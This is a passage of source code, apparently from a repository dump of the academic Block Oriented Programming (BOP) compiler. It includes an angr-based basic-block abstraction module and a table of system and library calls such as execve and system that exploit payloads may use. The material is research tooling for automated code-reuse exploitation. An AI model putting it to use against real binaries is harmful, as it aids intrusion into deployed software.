<const>\n                # -----------------------------------------------------------------------\n                if len(node) == 2:                  # we need 2 leaves + 1 operator\n                    self.cond['form'] = 'simple'    # we're in the simple form\n\n                    try:\n                        # swap register and constant if needed\n                        if node[1].op == 'BVS' and node[0].op == 'BVV' and node[0].concrete:\n                            node[0], node[1] = node[1], node[0]\n\n\n                        # if we're in the right form (reg and const), we have our condition\n                        if node[0].op == 'BVS' and node[1].op == 'BVV' and node[1].concrete:\n                            self.cond['reg']   = self.__symreg[node[0]]\n                            self.cond['const'] = state.se.eval(node[1])\n                        else:\n                            self.cond = { }         # not in the right form\n                            return\n\n                    except KeyError:                    \n                        # if not in the right form, __symreg() will throw a KeyError exception\n                        self.cond = { }\n                        return\n\n\n                # -----------------------------------------------------------------------\n                # Check if we're in the extended form: (<reg> <op> <const>) <op> <const>\n                # (example: \"<SAO <Bool (rbx_1_64 + 0x1) == 0x8>>\")\n                # \n                # This is when the iterator (register) gets modified and compared at the\n                # same basic block.\n                # -----------------------------------------------------------------------\n                elif len(node) == 3:                # we need 3 leaves and 2 operators\n                    self.cond['form'] = 'extended'  # we're in the extended form\n\n                    try:\n                        # get left and right side of the comparison\n                        left, right = action.condition.split( action.condition.op )\n\n                        # if the constant is on the left side, swap sides\n                        if left.op == 'BVV' and left.concrete:\n                            left, right = right, left\n\n\n                        mod_ops = {                 # register modification operations\n                            '__add__'    : '+',\n                            '__sub__'    : '-',\n                            '__mul__'    : '*',\n                            '__div__'    : '/',\n                            '__and__'    : '&',\n                            '__or__'     : '|',\n                            '__xor__'    : '^',\n                            '__invert__' : '~',\n                            '__lshift__' : '<<',\n                            '__rshift__' : '>>'\n                        }\n\n                        \n                        # if the left side is a modification and the right side a constant\n                        if left.op in mod_ops and right.op == 'BVV' and right.concrete:\n                            self.cond['const']  = state.se.eval(right)\n                            self.cond['mod_op'] = mod_ops[ left.op ]\n\n                            reg, const = left.split( left.op )\n\n                            # if the constant is on the left side, swap sides\n                            if reg.op == 'BVV' and reg.concrete:\n                                reg, const = const, reg\n\n                            # if the modification uses a constant and a register\n                            if reg.op   == 'BVS' and reg in self.__symreg and \\\n                               const.op == 'BVV' and const.concrete:\n                                    self.cond['reg']       = self.__symreg[reg]\n                                    self.cond['mod_const'] = state.se.eval(const)\n                            else:\n                                self.cond = { }     # something is not in the right form\n                                return    \n                        else:\n                            self.cond = { }\n                            return    \n                                    \n                    except ValueError:              # != 2 values to split()\n                        self.cond = { }\n                        return\n\n\n                # -----------------------------------------------------------------------\n                # Otherwise we're not in the right form\n                # -----------------------------------------------------------------------\n                else:\n                    self.cond = { }\n                    continue\n\n\n                # The problem here, is that simgr sometimes \"inverts\" the condition, so the \n                # \"target\" basic block is the block immediately after the current block. To \n                # be consistent, we have to \"invert\" the operator, so the target basic block\n                # is executed when the jump is taken.\n                blk = self.__proj.factory.block(self.__entry) \n\n                # check if the target is the next block (assume action.target is concrete)\n                if state.se.eval(action.target) == blk.addr + blk.size:\n                    self.cond['op'] = {                 # invert the condition\n                        '==' : '!=',\n                        '!=' : '==',\n                        '>'  : '<=',\n                        '>=' : '<',\n                        '<'  : '>=',\n                        '<=' : '>'\n                    }[ self.cond['op'] ]  \n\n            break                                   # there's up to 1 conditional jump\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __add_sym_vars(): This function extracts all (memory) symbolic variables from an expression.\n    #       For instance, given the expression: <BV64 mem_7fffffffffef1e8_82_64 + 0x68>, we want to\n    #       map the variable 'mem_7fffffffffef1e8_82_64' to its actual address: 0x7fffffffffef1e8.\n    #\n    # :Arg addr_expr: The address expression to get variables from\n    # :Ret: None.\n    #\n    def __add_sym_vars( self, addr_expr ):\n        # A memory symbolic variable is in the form: mem_ADDRESS_RANDOM_SIZE. The AST leaf\n        # will be like this: \"<BV64 mem_7ffffffffff13e8_4928_64{UNINITIALIZED}>\"\n        #\n        # We want to extract the ADDRESS and SIZE fields\n        for leaf in addr_expr.recursive_leaf_asts:  # for each leaf in the AST\n            leafstr = leaf.shallow_repr()           # cast it to sting\n\n            # if leaf is a memory variable, extract its address and its size\n            if re.search(r'mem_[0-9a-f]+_[0-9]+_[0-9]+', leafstr):\n                _, addr, rand, size = leafstr.split('_')\n\n                # size might be followed by the \"{UNINITIALIZED}\" keyword, so it must be dropped\n                # if not the \">\" must also be dropped\n                size = size.replace(\"{UNINITIALIZED}>\", \"\").replace(\">\", \"\")\n\n                # add the symbolic variable to the map\n                self.symvars[ leaf ] = (int(addr, 16), int(size, 10) >> 3)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __memread_callback(): This function is invoked every time that a memory read operation is \n    #       performed.\n    #\n    # :Arg state: Current state to read memory from\n    # :Ret: None.\n    #\n    def __memread_callback( self, state ):\n        if self.__callback_mutex == 1:              # if mutex is taken, return\n            return\n        \n        self.__callback_mutex = 1                   # get lock\n\n        # ---------------------------------------------------------------------\n        # If address is part of the .bss/.data, it will be initialized with a\n        # default value of 0. However, it can get any value (due to AWP) so it\n        # should get a symbolic value.\n        # ---------------------------------------------------------------------\n        # get ELF sections that give default values to their uninitialized variables\n        bss  = self.__proj.loader.main_object.sections_map[\".bss\"]\n        data = self.__proj.loader.main_object.sections_map[\".data\"]\n\n        addr = state.se.eval(state.inspect.mem_read_address)\n        # print '=== READ', hex(state.inspect.instruction), hex(addr)\n\n        # check if address is inside .bss or .data sections\n        if bss.min_addr  <= addr and addr <= bss.max_addr or \\\n           data.min_addr <= addr and addr <= data.max_addr:\n                # This is also works, but is for Big Endian:\n                #       state.memory.make_symbolic('mem', state.inspect.mem_read_address, length)\n\n                # make address symbolic\n                symv = state.se.BVS(\"mem_%x\" % addr, state.inspect.mem_read_length << 3)\n                \n                state.memory.store(state.inspect.mem_read_address, symv, \n                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)\n\n                # we should read it to update state.inspect.mem_read_expr\n                state.memory.load(state.inspect.mem_read_address,\n                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)\n\n\n        # -------------------------------------------------------------------------------\n        # Identifying dereferences is a two stage process. Here (1st step) we capture all\n        # memory load information (which happens before the register write) that happen \n        # at this instruction (x64 has 1 distinct memory read per insruction; however \n        # instructions like popad do multiple register writes, but this is not an issue \n        # here).\n        # -------------------------------------------------------------------------------\n        self.__load[ state.inspect.instruction ] = (\n                state.inspect.mem_read_address, \n                state.inspect.mem_read_length, \n                state.inspect.mem_read_expr         # this will be updated\n        )\n\n        # associate memory expression with memory address (needed for later on)\n        self.__mem2addr[ state.inspect.mem_read_expr.shallow_repr() ] = \\\n                                (state.inspect.mem_read_address, state.inspect.mem_read_length)\n      \n        # extract memory symbolic variables\n        self.__add_sym_vars( state.inspect.mem_read_address )    \n\n        self.__callback_mutex = 0                   # release lock\n\n   \n\n    # ---------------------------------------------------------------------------------------------\n    # __regwrite_callback(): This function is invoked every time that a register write operation\n    #       is performed.\n    #\n    # :Arg state: Current state to write register to\n    # :Ret: None.\n    #\n    def __regwrite_callback( self, state ):\n        if self.__callback_mutex == 1:              # if mutex is taken, return\n            return\n\n        self.__callback_mutex = 1                   # get lock\n        \n        try:\n            # get register that is being written\n            reg = self.__proj.arch.register_names[state.inspect.reg_write_offset]\n        except KeyError:                            # just in case\n            return\n\n\n        # TODO: Regwrite only checks writes, but it doesn't check if the previous value perists after\n        #       .text:000000000040BCEA         mov     eax, [rbp+ac]\n        #       .text:000000000040BCF0         cdqe\n        #       .text:000000000040BCF2         shl     rax, 3\n        #       .text:000000000040BCF6         mov     rcx, rax\n        #       .text:000000000040BCF9         add     rcx, [rbp+nargv]\n        # \n        # ('sudo' example)\n        #\n        # We should add some checks to test whether the regwrite is \"mov\" or something else\n\n\n        # print '--------------- ', hex(state.addr), hex(state.inspect.instruction), reg, \n        #                           state.inspect.reg_write_expr\n\n\n        # remember the \"raw\" value that is being written to the register\n        self.__reg_rawval[ reg ] = state.inspect.reg_write_expr\n\n        if reg not in HARDWARE_REGISTERS:           # we only care about specific registers\n            self.__callback_mutex = 0               # release lock\n            return        \n\n\n        # -------------------------------------------------------------------------------\n        # This is the 2nd step of the dereference identification process. At this point \n        # we match the instruction that writes a register with the instruction that read\n        # from memory. This is because we want to match the memory read expression with\n        # the register write.\n        # -------------------------------------------------------------------------------\n        elif state.inspect.instruction in self.__load:\n            addr, length, _ = self.__load[ state.inspect.instruction ]\n\n\n            # ok we have a dereference!\n            deps   = [ ]                            # dependent registers\n            symtab = { }\n\n            # find register dependencies on the address (e.g., rsi on <BV64 rsi_44_64 + 0x18>)\n            for sym, nam in self.__symreg.iteritems():\n                # skip registers that are not symbolic (e.g., rbp)\n                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():\n                    deps.append(nam)\n                    symtab[nam] = sym\n\n\n            # there might be dependencies with constant memory addresses as well (i.e., reading\n            # from global variables). Such dependencies are handled during trace searching, so \n            # we ignore them for now. However the register dependencies are needed to check\n            # whether a register mapping is valid or not.\n\n\n            # if \"deps\" has a single element, we know that a register is containted in \"addr\"\n            # expression. If also that expression has a single node, we know that this will be\n            # that register.\n            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:\n                memrd = length\n            else:\n                memrd = None\n\n            \n            # (if basic block has >1 dereferences on the same register, use the most recent one)\n            self.regwr[ reg ] = {                   # set data\n                'type'  : 'deref',\n                'addr'  : addr,\n                'deps'  : deps,\n                'sym'   : symtab,\n                'memrd' : memrd\n            }\n\n\n        # -------------------------------------------------------------------------------\n        # The current approach for detecting dereferences is not transitive. Consider the\n        # following example:\n        #       mov rcx, [rsi + 0x10]\n        #       mov rdi, rcx\n        #\n        # In the 2nd register write, rdi gets an unconstrained symbolic variable (e.g., \n        # <SAO <BV64 Reverse(symbolic_read_unconstrained_17_64)>>) and therefore it's of\n        # type 'clob'. However, we want rdi to be treated in the same way with rcx, as\n        # they both have the exact same value. Because SE engine gives a unique symbolic\n        # variable on every memory cell, we can associate them with their addresses. \n        # Thus, when a register gets a random symbolic value, we can figure out whether\n        # it is actually a dereference.\n        # -------------------------------------------------------------------------------\n        elif state.inspect.reg_write_expr.shallow_repr() in self.__mem2addr:\n            addr, length = self.__mem2addr[ state.inspect.reg_write_expr.shallow_repr() ]\n\n            # this code is copy-pasta from above\n            deps    = [ ]\n            symtab  = { }\n\n            for sym, nam in self.__symreg.iteritems():\n                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():\n                    deps.append(nam)\n                    symtab[nam] = sym\n\n\n            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:\n                memrd = length\n            else:\n                memrd = None\n\n\n            self.regwr[ reg ] = {\n                'type'  : 'deref',\n                'addr'  : addr,\n                'deps'  : deps,\n                'sym'   : symtab,\n                'memrd' : memrd\n            }\n            \n\n        # -------------------------------------------------------------------------------\n\n        self.__callback_mutex = 0                   # release lock\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set\n    #       an alarm. When the alarm is triggered, this singal handler is invoked and throws an\n    #       exception that causes the symbolic execution to halt.\n    #\n    # :Arg signum: Signal number\n    # :Arg frame: Current stack frame\n    # :Ret: None.\n    #\n    def __sig_handler( self, signum, frame ):        \n        if signum == signal.SIGALRM:                # we only care about SIGALRM\n\n            # angr may ignore the exception, so let's throw many of them :P\n            raise Exception(\"Alarm triggered after %d seconds\" % ABSBLK_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % ABSBLK_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % ABSBLK_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % ABSBLK_TIMEOUT)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. This function initializes the environment for the symbolic\n    #       execution, it executes the basic block, and performs the abstraction.\n    #\n    # :Arg project: Instance of angr project\n    # :Arg addr: Entry point of the basic block\n    # :Ret: None.\n    #\n    def __init__( self, project, addr ):\n        self.__proj  = project                      # we'll need these\n        self.__entry = addr\n\n        \n        # ---------------------------------------------------------------------\n        # initialize abstraction variables\n        # ---------------------------------------------------------------------\n        self.regwr      = { }                       # all register writes for that block\n        self.memrd      = set()                     # all memory reads for that block\n        self.memwr      = set()                     # all memory writes for that block\n        self.conwr      = set()                     # all concrete memory writes for that block\n        self.splmemwr   = [ ]                       # all memory register writes for that block\n        self.call       = { }                       # function/system call (if any) for that block\n        self.cond       = { }                       # conditional jumps (if any) for that block\n        self.symvars    = { }                       # symbolic variables for memory\n        self.__load     = { }                       # memory loads (for internal use)\n        self.__mem2addr = { }                       # map between memory expressions and addresses\n\n        self.__mem = { }\n        self.__reg_rawval = { }\n\n        # ---------------------------------------------------------------------\n        # Create a blank state and prepare it for symbolic execution.\n        #\n        # TODO: Check options again\n        # ---------------------------------------------------------------------\n        inist = self.__proj.factory.blank_state(    # create a blank state\n            addr=addr,                              # set address\n            #mode='symbolic', \n            add_options={                           # configure options\n                simuvex.o.AVOID_MULTIVALUED_READS,\n                simuvex.o.AVOID_MULTIVALUED_WRITES,\n                simuvex.o.NO_SYMBOLIC_JUMP_RESOLUTION,\n                simuvex.o.CGC_NO_SYMBOLIC_RECEIVE_LENGTH,\n                simuvex.o.NO_SYMBOLIC_SYSCALL_RESOLUTION,\n                simuvex.o.TRACK_ACTION_HISTORY,\n                \n                # newly added option\n                simuvex.o.SYMBOLIC_INITIAL_VALUES\n            },\n            remove_options=simuvex.o.resilience_options | simuvex.o.simplification           \n        )\n\n        # configure more options (add/remove)\n        inist.options.discard(simuvex.o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)\n        inist.options.update( {\n            simuvex.o.TRACK_REGISTER_ACTIONS,\n            simuvex.o.TRACK_MEMORY_ACTIONS,\n            simuvex.o.TRACK_JMP_ACTIONS,\n            simuvex.o.TRACK_CONSTRAINT_ACTIONS }\n        )\n\n      \n        # ---------------------------------------------------------------------\n        # initialize all registers with a symbolic variable\n        # ---------------------------------------------------------------------\n        inist.regs.rax = inist.se.BVS(\"rax\", 64)    # give convenient names\n        inist.regs.rbx = inist.se.BVS(\"rbx\", 64)\n        inist.regs.rcx = inist.se.BVS(\"rcx\", 64)\n        inist.regs.rdx = inist.se.BVS(\"rdx\", 64)\n        inist.regs.rsi = inist.se.BVS(\"rsi\", 64)\n        inist.regs.rdi = inist.se.BVS(\"rdi\", 64)\n\n\n        # rbp may also needed as it's mostly used to access local variables (e.g., \n        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are\n        # rsp related. In these cases it may worth to use rbp as well.\n        if MAKE_RBP_SYMBOLIC:\n            inist.regs.rbp = inist.se.BVS(\"rbp\",64) # keep rbp symbolic\n        else:\n            inist.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8, endness=archinfo.Endness.LE)\n        \n        # rsp must be concrete and properly initialized\n        inist.registers.store('rsp', RSP_BASE_ADDR, size=8, endness=archinfo.Endness.LE)\n\n        inist.regs.r8  = inist.se.BVS(\"r08\", 64)\n        inist.regs.r9  = inist.se.BVS(\"r09\", 64)\n        inist.regs.r10 = inist.se.BVS(\"r10\", 64)\n        inist.regs.r11 = inist.se.BVS(\"r11\", 64)\n        inist.regs.r12 = inist.se.BVS(\"r12\", 64)\n        inist.regs.r13 = inist.se.BVS(\"r13\", 64)\n        inist.regs.r14 = inist.se.BVS(\"r14\", 64)\n        inist.regs.r15 = inist.se.BVS(\"r15\", 64)\n\n\n        # ---------------------------------------------------------------------\n        # Other initializations\n        # ---------------------------------------------------------------------        \n        # map symbolic names to registers\n\n        # self.__symreg = { self.__getreg(inist, r):r for r in HARDWARE_REGISTERS }\n        self.__symreg = { \n            inist.regs.rax : 'rax',\n            inist.regs.rbx : 'rbx',\n            inist.regs.rcx : 'rcx',\n            inist.regs.rdx : 'rdx',\n            inist.regs.rsi : 'rsi',\n            inist.regs.rdi : 'rdi',\n            inist.regs.rbp : 'rbp',\n            inist.regs.rsp : 'rsp',\n            inist.regs.r8  : 'r8',\n            inist.regs.r9  : 'r9',\n            inist.regs.r10 : 'r10',\n            inist.regs.r11 : 'r11',\n            inist.regs.r12 : 'r12',\n            inist.regs.r13 : 'r13',\n            inist.regs.r14 : 'r14',\n            inist.regs.r15 : 'r15'\n        }\n\n\n        # UPDATE: Don't create a symbolic stack, as this consumes all the Virtual Memory and\n        # may crash the machine. By carefully configuring rsp and rbp within the limit of virtual\n        # page limit, we can achieve the same effect, so we don't need a symbolic stack.\n        #\n        # The main issue here are the permissions (stack may not appear as R+W), but as long as\n        # both rsp and rbp point in the same page, there is no problem.\n        #\n        #\n        #       # create a symbolic stack (required to have writable pages)\n        #       stack = inist.se.BVS(\"stack\", self.__proj.arch.bits * _STACK_SZ)     \n        #\n        #       # write symbolic stack to memory  \n        #       # inist.memory.store(inist.regs.sp, stack, endness=archinfo.Endness.LE)                    \n        #       inist.memory.store(STACK_BASE_ADDR, stack, endness=archinfo.Endness.LE)\n\n        # when solver gives up (in milliseconds)\n        inist.se._solver.timeout = ABSBLK_TIMEOUT*1000\n\n\n        # ---------------------------------------------------------------------\n        # Hooks for identifying dereferences\n        # ---------------------------------------------------------------------\n        self.__callback_mutex = 0                   # hooks are enabled\n\n        inist.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__regwrite_callback)\n        inist.inspect.b('mem_read',  when=angr.BP_AFTER,  action=self.__memread_callback)\n        \n        \n        # -------------------------------------------------------------------------\n        # Do the symbolic execution (using simulation managers)\n        # ------------------------------------------------------------------------- \n        simgr = self.__proj.factory.simulation_manager(thing=inist)\n        simgr.save_unconstrained = True             # do not discard unconstrained stashes\n\n\n        signal.signal(signal.SIGALRM, self.__sig_handler)\n        signal.alarm(ABSBLK_TIMEOUT)                  \n\n\n        # make sure that you execute the normalized block\n        # TODO: cleanup\n        node = ADDR2NODE[self.__entry]\n        num_inst = len(node.instruction_addrs) if node is not None else None\n        if num_inst:\n           simgr.step(num_inst=num_inst)\n        \n        else:\n            simgr.step()                            # execute 1 basic block\n    \n        signal.alarm(0)                             # disable alarm\n\n\n        if simgr.active:                            # check if execution was successful\n            newst = simgr.active[0]                 # get the new state (after execution)\n\n        elif simgr.unconstrained:\n            # because we execute a single basic block, it's possible to end up in an state that\n            # instruction pointer depends on symbolic data and hence to not know how to proceed\n            # (i.e., unconstrained stash)\n            newst = simgr.unconstrained[0]\n\n        elif simgr.deadended:                       # check if execution can't continue (retq)\n            newst = simgr.deadended[0]              # work with what you have\n           \n        else:                                       # everything else should generate an error\n            print simgr.stashes\n            raise Exception('There are no usable stashes!')\n\n\n        # -------------------------------------------------------------------------\n        # Analyze results and generate the abstractions\n        # ------------------------------------------------------------------------- \n        self.__reg_w(newst)                         # analyze register writes\n        self.__mem_r(newst)                         # analyze memory reads\n        self.__mem_w(newst)                         # analyze memory writes\n        self.__call(newst)                          # analyze function/system calls\n        self.__cond(newst)                          # analyze conditional jumps\n\n\n        # -------------------------------------------------------------------------\n        # Apply (any) patches\n        #\n        # Instructions like 'rep movsq' incorrectly classify rsi and rdi in 'deref'\n        # types. This is because angr assigns a basic block with a single rep* \n        # instruction (as VEX IR contains loops). To fix that, we simply mark the\n        # used registers as clobbering.\n        # ------------------------------------------------------------------------- \n        blk_insns = node.block.capstone.insns       # get block instructions\n\n        if len(blk_insns) == 1 and 'rep' in blk_insns[0].insn.mnemonic:\n            # name = blk_insns[0].insn.insn_name()    # get instruction name (w/o the rep*)\n              \n            # make 'rsi', 'rdi' and 'rcx' clobbering (all of them are modified)\n            self.regwr['rdi'] = {'type' : 'clob'}    \n            self.regwr['rsi'] = {'type' : 'clob'}\n            self.regwr['rcx'] = {'type' : 'clob'}            \n\n\n        '''\n        print\n        print '-------------------- Register Writes --------------------'                   \n        for a, b in self.regwr.iteritems():\n            print a, b\n\n        print '-------------------- Memory Reads --------------------'            \n        for a, b in self.memrd:\n            print a, b\n\n        print '-------------------- Memory Writes --------------------'            \n        for a, b in self.memwr:\n            print a, b\n\n        print '-------------------- Concrete Writes --------------------'            \n        for a, b in self.conwr:\n            print a, b\n\n        print '-------------------- SPL Memory Writes --------------------'            \n        for a in self.splmemwr:\n            print a\n\n        print '-------------------- Calls --------------------'            \n        print self.call\n\n        print '-------------------- Conditional Jumps --------------------'            \n        print self.cond\n        '''\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __getitem__(): An alternative way to get block \"abstractions\".  \n    #\n    # :Arg what: The name of the abstraction that you want to get\n    # :Ret: The requested abstraction.\n    # \n    def __getitem__( self, what ):\n        try:\n            return {\n                'regwr'    : self.regwr,\n                'memrd'    : self.memrd,\n                'memwr'    : self.memwr,\n                'conwr'    : self.conwr,\n                'splmemwr' : self.splmemwr,\n                'call'     : self.call,\n                'cond'     : self.cond,\n                'symvars'  : self.symvars\n            }[ what ]\n        except KeyError:\n            return None                             # abstraction not found\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __iter__(): Iterate over all abstractions. This function is a generator over all possible\n    #       abstractions.\n    #\n    # :Ret: Each time function returns a different tuple (name, abstraction).\n    # \n    def __iter__( self ):   \n        yield 'regwr',    self.regwr\n        yield 'memrd',    self.memrd\n        yield 'memwr',    self.memwr\n        yield 'conwr',    self.conwr\n        yield 'splmemwr', self.splmemwr\n        yield 'call',     self.call\n        yield 'cond',     self.cond\n        yield 'symvars',  self.symvars \n\n\n\n# -------------------------------------------------------------------------------------------------\n'''\nif __name__ == '__main__':                          # DEBUG ONLY\n    import angr\n\n    project = angr.Project('eval/opensshd/sshd', load_options={'auto_load_libs': False})    \n    # project.analyses.CFGFast()                    # to prepare project.kb.functions\n\n    # Problem: Inidirect pointers in .bss:\n    #   .text:00000000004050B1         mov     rax, cs:public_key\n    #   .text:00000000004050B8         mov     rdi, [rax+20h]          ; value\n    #\n    # abstr = abstract_ng(project, 0x4050B1)\n\n    # abstr = abstract_ng(project, 0x416610)\n    abstr = abstract_ng(project, 0x416631)\n\n    # TODO: check me again!\n    abstr = abstract_ng(project, 0x0x40c01f)\n\n    for a, b in abstr:\n        print '\\t', a, b\n\n    print 'done!'\n'''\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/calls.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# calls.py\n#\n# This module contains all declarations for system and library calls that SPL supports. A call is\n# declared as a tuple (name, nargs, modregs):\n#\n#       name    : The library/system call name\n#       nargs   : The number of its arguments. Set to INFINITY for variadic functions.\n#       modregs : A list of all registers that are modified when the call returns. Note that rax \n#                 is always modified as it has the return value.\n#\n# To keep the implementation simple, We do not support library calls that take arguments on the\n# stack.\n#\n# Also, it is possible to declare any custom calls that reside in the binary.\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Calling Conventions\n# -------------------------------------------------------------------------------------------------\nSYSCALL_CC = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']\nLIBCALL_CC = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Supported system calls\n# -------------------------------------------------------------------------------------------------\nsyscalls__ = [\n    # ssize_t read(int fd, void *buf, size_t count)\n    ('read',    3,  ['rax', 'rcx', 'r10', 'r11']),\n\n    # ssize_t write(int fd, const void *buf, size_t count)\n    ('write',   3,  ['rax', 'rcx', 'r10', 'r11']),\n\n    # void *sbrk(intptr_t increment)\n    ('sbrk',    1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int brk(void *addr)\n    ('brk',     1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int dup(int oldfd)\n    ('dup',     1,  ['rax', 'rcx', 'r11']),\n\n    # int dup2(int oldfd, int newfd)\n    ('dup2',    2,  ['rax', 'rcx', 'r10', 'r11']),\n\n    # unsigned int alarm(unsigned int seconds)\n    ('alarm',   1,  ['rax', 'rcx', 'r10', 'r11']),\n\n\n    '''\n        Feel free to append more syscalls...\n    '''\n]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Supported library calls\n# -------------------------------------------------------------------------------------------------\nlibcalls__ = [\n    # int system(const char *command)\n    ('system',  1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),\n\n    # int puts(const char *s)\n    ('puts',    1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),\n\n    # int execve(const char *filename, char *const argv[], char *const envp[])\n    ('execve',  3,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int execv(const char *filename, char *const argv[])\n    ('execv',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n    \n    # int execl(const char *path, const char *arg, ...);\n    ('execl',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),\n\n    # int printf(const char *format, ...)\n    ('printf',  INFINITY,  ['rax', 'rcx', 'rdx', 'rsi', 'rdi',  'r8', 'r10', 'r11']),\n\n    # ssize_t send(int sockfd, const void *buf, size_t len, int flags);\n    # (we can ignore the 4th parameter for now)\n    ('send',    3,  []),\n\n    # void exit(int status)\n    ('exit',    1,  []),\n\n\n    '''\n        Feel free to append more libcalls...\n    '''\n]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# In case that you don't want to distinguish them\n# -------------------------------------------------------------------------------------------------\ncalls__ = syscalls__ + libcalls__\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Groups of function calls that have similar effects\n# -------------------------------------------------------------------------------------------------\ncall_groups__ = [\n    ['puts',   'printf'],\n    ['execve', 'execv', 'execl' ],\n]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# find_syscall(): Search for a specific system call.\n#\n# :Arg name: Name of the syscall\n# :Ret: If system call exists, function returns the associated entry in syscalls__. Otherwise None\n#       is returned.\n#\ndef find_syscall( name ):\n    call = filter(lambda call: call[0] == name, syscalls__)\n\n    if len(call) == 0:\n        return None\n\n    elif len(call) == 1:\n        return call[0]\n\n    else:\n        raise Exception(\"System call '%s' has >1 entries in syscalls__ table.\" % name)\n\n\n\n# -------------------------------------------------------------------------------------------------\n# find_libcall(): Search for a specific library call.\n#\n# :Arg name: Name of the library call\n# :Ret: If library call exists, function returns the associated entry in libcalls__. Otherwise None\n#       is returned.\n#\ndef find_libcall( name ):\n    call = filter(lambda call: call[0] == name, libcalls__)\n\n    if len(call) == 0:\n        return None\n\n    elif len(call) == 1:\n        return call[0]\n\n    else:\n        raise Exception(\"Library call '%s' has >1 entries in libcalls__ table.\" % name)\n\n\n\n# -------------------------------------------------------------------------------------------------\n# find_call(): Search for a specific call (either library or system)\n#\n# :Arg name: Name of the call\n# :Ret: If call exists, function returns the associated entry in calls__. Otherwise None is\n#       returned.\n#\ndef find_call( name ):\n    sys = find_syscall(name)\n    lib = find_libcall(name)\n\n    return sys if sys else lib                      # logic OR\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/capability.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# capability.py\n#\n# This module measures the capability of the program. That is, program's capability gives a good\n# indication, on \"what the program is capable of executing\" in terms of SPL payloads. However, all\n# these metrics, aim to identify *upper bounds*; that is, they overestimate the set of SPL programs\n# that can be truly executed on this binary.\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nfrom calls     import 